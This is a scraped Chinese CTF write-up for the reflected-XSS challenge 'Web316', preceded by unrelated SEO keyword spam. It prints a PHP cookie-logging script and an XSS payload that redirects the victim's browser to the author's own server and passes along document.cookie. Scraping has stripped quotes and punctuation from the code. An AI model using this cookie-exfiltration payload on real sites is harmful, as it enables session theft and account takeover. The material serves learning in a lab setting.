网站开发要,松江品划网站建设维护,广州网站建设外贸,房地产经纪人资格证Web316
进入界面#xff1a;
审计
显示是关于反射性XSS的题目。
思路
首先想到利用XSS平台解题#xff0c;看其他师傅的wp提示flag是在cookie中。 当前页面的cookie是flagyou%20are%20not%20admin%20no%20flag。 但是这里我使用XSS平台#xff0c;显示的cookie还是这样…Web316
进入界面
审计
显示是关于反射性XSS的题目。
思路
首先想到利用XSS平台解题看其他师傅的wp提示flag是在cookie中。 当前页面的cookie是flagyou%20are%20not%20admin%20no%20flag。 但是这里我使用XSS平台显示的cookie还是这样并不能得到flag。该方法先作罢。
于是我们使用稳定性更高的方法写js代码将cookie传到自己的服务器上。 先在服务器写一个php文件
//flag.php
?php
$cookie $_GET[cookie];
$log fopen(cookie.txt, a);
fwrite($log, $cookie . \n);
fclose($log);
?然后在靶机中传入如下代码
scriptlocation.hrefhttp://[自己服务器的IP]/flag.php?cookiedocument.cookie/script提交之后成功跳转到自己的网页。 查看自己服务器中的cookie.txt文件得到flag。
